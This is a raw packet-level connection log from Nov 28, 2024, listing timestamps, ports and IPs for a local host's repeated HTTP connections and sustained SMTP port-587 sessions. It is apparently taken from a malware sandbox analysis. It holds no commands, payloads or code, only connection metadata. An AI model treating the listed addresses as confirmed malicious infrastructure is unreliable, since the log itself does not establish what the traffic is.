Nov 28, 2024 06:44:34.045116901 CET	49941	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:44:34.046021938 CET	49941	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:44:34.084325075 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:34.087399006 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:34.169702053 CET	80	49941	18.208.156.248	192.168.2.4
Nov 28, 2024 06:44:34.211147070 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:34.504714012 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:34.534632921 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:34.748379946 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:34.812391996 CET	80	49936	85.214.228.140	192.168.2.4
Nov 28, 2024 06:44:34.812474966 CET	49936	80	192.168.2.4	85.214.228.140
Nov 28, 2024 06:44:34.812530994 CET	49936	80	192.168.2.4	85.214.228.140
Nov 28, 2024 06:44:34.936211109 CET	80	49936	85.214.228.140	192.168.2.4
Nov 28, 2024 06:44:34.948381901 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:34.948935986 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:35.028605938 CET	49942	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:35.072639942 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:35.153601885 CET	80	49942	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:35.153672934 CET	49942	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:35.156191111 CET	49942	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:35.156191111 CET	49942	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:35.279895067 CET	80	49942	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:35.279915094 CET	80	49942	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:35.367777109 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:35.369630098 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:35.493505955 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:35.789730072 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:35.793726921 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:35.793770075 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:35.793801069 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:35.793838978 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:35.798382044 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:35.917603016 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:35.917617083 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:35.917624950 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:35.917634010 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:35.917661905 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:35.917699099 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:35.922224998 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:35.922235012 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:35.922287941 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:35.922291994 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:35.922303915 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:35.922365904 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:35.922396898 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:35.922406912 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:35.922449112 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:35.922465086 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:35.922475100 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:35.922522068 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:35.922528028 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:35.923620939 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:36.041610003 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.041619062 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.041743040 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:36.046603918 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.046798944 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.046857119 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:36.046911001 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.047127962 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.047200918 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:36.047509909 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.047802925 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:36.092036963 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.092091084 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:36.165673018 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.165695906 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.165738106 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:36.165761948 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:36.170629025 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.170681953 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.170875072 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.170972109 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.171019077 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.171132088 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.171224117 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.171276093 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.171375036 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.171461105 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.171477079 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.171571970 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.171580076 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.171660900 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.171669960 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.171724081 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.171861887 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.171886921 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.171895981 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.171910048 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.171957970 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.172034979 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.172044992 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.172103882 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.215897083 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.215976000 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.289557934 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.289676905 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.289686918 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.289695024 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.289732933 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.289741993 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.701097965 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:44:36.841842890 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:44:37.287375927 CET	80	49942	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:37.287611961 CET	49942	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:37.287636042 CET	80	49942	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:37.287764072 CET	49942	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:37.411381006 CET	80	49942	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:37.770499945 CET	49943	80	192.168.2.4	34.246.200.160
Nov 28, 2024 06:44:37.895257950 CET	80	49943	34.246.200.160	192.168.2.4
Nov 28, 2024 06:44:37.899046898 CET	49943	80	192.168.2.4	34.246.200.160
Nov 28, 2024 06:44:37.899256945 CET	49943	80	192.168.2.4	34.246.200.160
Nov 28, 2024 06:44:37.899270058 CET	49943	80	192.168.2.4	34.246.200.160
Nov 28, 2024 06:44:38.023192883 CET	80	49943	34.246.200.160	192.168.2.4
Nov 28, 2024 06:44:38.023201942 CET	80	49943	34.246.200.160	192.168.2.4
Nov 28, 2024 06:44:39.330457926 CET	80	49943	34.246.200.160	192.168.2.4
Nov 28, 2024 06:44:39.330571890 CET	80	49943	34.246.200.160	192.168.2.4
Nov 28, 2024 06:44:39.330620050 CET	49943	80	192.168.2.4	34.246.200.160
Nov 28, 2024 06:44:39.330668926 CET	49943	80	192.168.2.4	34.246.200.160
Nov 28, 2024 06:44:39.454350948 CET	80	49943	34.246.200.160	192.168.2.4
Nov 28, 2024 06:44:39.806669950 CET	49944	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:44:39.930567980 CET	80	49944	18.141.10.107	192.168.2.4
Nov 28, 2024 06:44:39.931627035 CET	49944	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:44:39.933715105 CET	49944	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:44:39.933715105 CET	49944	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:44:40.057538986 CET	80	49944	18.141.10.107	192.168.2.4
Nov 28, 2024 06:44:40.057569981 CET	80	49944	18.141.10.107	192.168.2.4
Nov 28, 2024 06:44:41.545205116 CET	49914	80	192.168.2.4	208.100.26.245
Nov 28, 2024 06:44:41.669420004 CET	80	49914	208.100.26.245	192.168.2.4
Nov 28, 2024 06:44:41.669609070 CET	49914	80	192.168.2.4	208.100.26.245
Nov 28, 2024 06:44:42.053822994 CET	80	49944	18.141.10.107	192.168.2.4
Nov 28, 2024 06:44:42.053890944 CET	80	49944	18.141.10.107	192.168.2.4
Nov 28, 2024 06:44:42.054040909 CET	49944	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:44:42.054740906 CET	49944	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:44:42.180329084 CET	80	49944	18.141.10.107	192.168.2.4
Nov 28, 2024 06:44:42.535522938 CET	49945	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:42.661053896 CET	80	49945	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:42.661154032 CET	49945	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:42.681236982 CET	49945	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:42.681461096 CET	49945	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:42.805561066 CET	80	49945	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:42.805680990 CET	80	49945	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:44.702972889 CET	80	49945	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:44.703165054 CET	80	49945	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:44.703246117 CET	49945	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:44.705056906 CET	49945	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:44.828738928 CET	80	49945	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:45.191907883 CET	49946	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:44:45.315684080 CET	80	49946	18.208.156.248	192.168.2.4
Nov 28, 2024 06:44:45.315778017 CET	49946	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:44:45.315984964 CET	49946	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:44:45.316040993 CET	49946	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:44:45.439754963 CET	80	49946	18.208.156.248	192.168.2.4
Nov 28, 2024 06:44:45.439776897 CET	80	49946	18.208.156.248	192.168.2.4
Nov 28, 2024 06:44:46.465105057 CET	80	49946	18.208.156.248	192.168.2.4
Nov 28, 2024 06:44:46.465120077 CET	80	49946	18.208.156.248	192.168.2.4
Nov 28, 2024 06:44:46.465184927 CET	49946	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:44:46.465560913 CET	49946	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:44:46.589380980 CET	80	49946	18.208.156.248	192.168.2.4
Nov 28, 2024 06:44:46.943424940 CET	49947	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:47.067203045 CET	80	49947	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:47.067275047 CET	49947	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:47.067481995 CET	49947	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:47.067511082 CET	49947	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:47.191226006 CET	80	49947	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:47.191240072 CET	80	49947	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:48.463112116 CET	80	49947	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:48.463125944 CET	80	49947	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:48.463192940 CET	49947	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:48.463347912 CET	49947	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:44:48.587199926 CET	80	49947	18.246.231.120	192.168.2.4
Nov 28, 2024 06:44:48.943680048 CET	49948	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:44:49.067487955 CET	80	49948	44.221.84.105	192.168.2.4
Nov 28, 2024 06:44:49.067557096 CET	49948	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:44:49.068206072 CET	49948	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:44:49.068218946 CET	49948	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:44:49.192159891 CET	80	49948	44.221.84.105	192.168.2.4
Nov 28, 2024 06:44:49.192172050 CET	80	49948	44.221.84.105	192.168.2.4
Nov 28, 2024 06:44:50.270873070 CET	80	49948	44.221.84.105	192.168.2.4
Nov 28, 2024 06:44:50.270889044 CET	80	49948	44.221.84.105	192.168.2.4
Nov 28, 2024 06:44:50.270942926 CET	49948	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:44:50.271086931 CET	49948	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:44:50.394825935 CET	80	49948	44.221.84.105	192.168.2.4
Nov 28, 2024 06:44:50.743614912 CET	49949	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:44:50.867583990 CET	80	49949	54.244.188.177	192.168.2.4
Nov 28, 2024 06:44:50.867655993 CET	49949	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:44:50.867897987 CET	49949	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:44:50.867918968 CET	49949	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:44:50.991583109 CET	80	49949	54.244.188.177	192.168.2.4
Nov 28, 2024 06:44:50.991636038 CET	80	49949	54.244.188.177	192.168.2.4
Nov 28, 2024 06:44:52.281848907 CET	80	49949	54.244.188.177	192.168.2.4
Nov 28, 2024 06:44:52.282025099 CET	49949	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:44:52.282054901 CET	80	49949	54.244.188.177	192.168.2.4
Nov 28, 2024 06:44:52.282099962 CET	49949	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:44:52.407644033 CET	80	49949	54.244.188.177	192.168.2.4
Nov 28, 2024 06:44:52.756037951 CET	49950	80	192.168.2.4	3.254.94.185
Nov 28, 2024 06:44:52.879803896 CET	80	49950	3.254.94.185	192.168.2.4
Nov 28, 2024 06:44:52.879878044 CET	49950	80	192.168.2.4	3.254.94.185
Nov 28, 2024 06:44:52.880047083 CET	49950	80	192.168.2.4	3.254.94.185
Nov 28, 2024 06:44:52.880079031 CET	49950	80	192.168.2.4	3.254.94.185
Nov 28, 2024 06:44:53.003817081 CET	80	49950	3.254.94.185	192.168.2.4
Nov 28, 2024 06:44:53.003828049 CET	80	49950	3.254.94.185	192.168.2.4
Nov 28, 2024 06:44:54.310708046 CET	80	49950	3.254.94.185	192.168.2.4
Nov 28, 2024 06:44:54.310811996 CET	80	49950	3.254.94.185	192.168.2.4
Nov 28, 2024 06:44:54.310877085 CET	49950	80	192.168.2.4	3.254.94.185
Nov 28, 2024 06:44:54.434942007 CET	80	49950	3.254.94.185	192.168.2.4
Nov 28, 2024 06:44:54.815176964 CET	49951	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:44:54.939059973 CET	80	49951	18.141.10.107	192.168.2.4
Nov 28, 2024 06:44:54.939126015 CET	49951	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:44:54.939295053 CET	49951	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:44:54.939364910 CET	49951	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:44:55.063030958 CET	80	49951	18.141.10.107	192.168.2.4
Nov 28, 2024 06:44:55.063043118 CET	80	49951	18.141.10.107	192.168.2.4
Nov 28, 2024 06:44:58.161187887 CET	80	49951	18.141.10.107	192.168.2.4
Nov 28, 2024 06:44:58.161211967 CET	80	49951	18.141.10.107	192.168.2.4
Nov 28, 2024 06:44:58.161288023 CET	49951	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:44:58.165884972 CET	49951	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:44:58.289644957 CET	80	49951	18.141.10.107	192.168.2.4
Nov 28, 2024 06:44:58.714309931 CET	49952	80	192.168.2.4	34.246.200.160
Nov 28, 2024 06:44:58.838119030 CET	80	49952	34.246.200.160	192.168.2.4
Nov 28, 2024 06:44:58.838195086 CET	49952	80	192.168.2.4	34.246.200.160
Nov 28, 2024 06:44:58.848084927 CET	49952	80	192.168.2.4	34.246.200.160
Nov 28, 2024 06:44:58.848113060 CET	49952	80	192.168.2.4	34.246.200.160
Nov 28, 2024 06:44:58.971889973 CET	80	49952	34.246.200.160	192.168.2.4
Nov 28, 2024 06:44:58.971900940 CET	80	49952	34.246.200.160	192.168.2.4
Nov 28, 2024 06:45:00.222384930 CET	80	49952	34.246.200.160	192.168.2.4
Nov 28, 2024 06:45:00.222491026 CET	80	49952	34.246.200.160	192.168.2.4
Nov 28, 2024 06:45:00.222543001 CET	49952	80	192.168.2.4	34.246.200.160
Nov 28, 2024 06:45:00.236850023 CET	49952	80	192.168.2.4	34.246.200.160
Nov 28, 2024 06:45:00.362890005 CET	80	49952	34.246.200.160	192.168.2.4
Nov 28, 2024 06:45:00.930357933 CET	49953	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:45:01.054011106 CET	80	49953	47.129.31.212	192.168.2.4
Nov 28, 2024 06:45:01.054104090 CET	49953	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:45:01.055309057 CET	49953	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:45:01.055336952 CET	49953	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:45:01.179127932 CET	80	49953	47.129.31.212	192.168.2.4
Nov 28, 2024 06:45:01.179138899 CET	80	49953	47.129.31.212	192.168.2.4
Nov 28, 2024 06:45:03.193403959 CET	80	49953	47.129.31.212	192.168.2.4
Nov 28, 2024 06:45:03.193543911 CET	80	49953	47.129.31.212	192.168.2.4
Nov 28, 2024 06:45:03.195122957 CET	49953	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:45:03.195997953 CET	49953	80	192.168.2.4	47.129.31.212
Nov 28, 2024 06:45:03.319736958 CET	80	49953	47.129.31.212	192.168.2.4
Nov 28, 2024 06:45:03.687043905 CET	49954	80	192.168.2.4	3.94.10.34
Nov 28, 2024 06:45:03.810858011 CET	80	49954	3.94.10.34	192.168.2.4
Nov 28, 2024 06:45:03.811111927 CET	49954	80	192.168.2.4	3.94.10.34
Nov 28, 2024 06:45:03.811578989 CET	49954	80	192.168.2.4	3.94.10.34
Nov 28, 2024 06:45:03.811655998 CET	49954	80	192.168.2.4	3.94.10.34
Nov 28, 2024 06:45:03.935226917 CET	80	49954	3.94.10.34	192.168.2.4
Nov 28, 2024 06:45:03.935302019 CET	80	49954	3.94.10.34	192.168.2.4
Nov 28, 2024 06:45:04.851176977 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:04.974977016 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:05.006124973 CET	80	49954	3.94.10.34	192.168.2.4
Nov 28, 2024 06:45:05.006135941 CET	80	49954	3.94.10.34	192.168.2.4
Nov 28, 2024 06:45:05.006195068 CET	49954	80	192.168.2.4	3.94.10.34
Nov 28, 2024 06:45:05.006287098 CET	49954	80	192.168.2.4	3.94.10.34
Nov 28, 2024 06:45:05.129918098 CET	80	49954	3.94.10.34	192.168.2.4
Nov 28, 2024 06:45:05.265806913 CET	587	49940	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:05.267175913 CET	49940	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:05.267493010 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:05.391211033 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:05.391346931 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:06.848984957 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:06.849118948 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:06.972785950 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:07.274003983 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:07.274163961 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:07.397907972 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:07.699575901 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:07.699975014 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:07.823745012 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:08.131361008 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:08.131436110 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:08.131453037 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:08.131489038 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:08.132771969 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:08.256407022 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:08.557894945 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:08.559040070 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:08.682765007 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:08.984060049 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:08.984237909 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:09.107986927 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:09.409574986 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:09.411274910 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:09.534980059 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:09.863940954 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:09.871051073 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:09.994806051 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:10.296276093 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:10.298978090 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:10.422739983 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:10.728275061 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:10.728420019 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:10.853693962 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.154926062 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.155267000 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.155307055 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.155307055 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.155344009 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.156315088 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.278970957 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.278990984 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.279016018 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.279041052 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.279087067 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.279122114 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.280088902 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.280105114 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.280137062 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.280155897 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.280220032 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.280250072 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.280253887 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.280345917 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.280355930 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.280395031 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.280477047 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.280487061 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.280525923 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.280569077 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.280608892 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.402695894 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.402829885 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.402893066 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.403887987 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.403960943 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.403994083 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.404011011 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.404165983 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.404232979 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.404269934 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.404285908 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.404330015 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.404406071 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.404428005 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.404470921 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.404503107 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.404584885 CET	587	49955	51.195.88.199	192.168.2.4
Nov 28, 2024 06:45:11.404637098 CET	49955	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:45:11.404665947 CET	587	49955	51.195.88.199	192.168.2.4
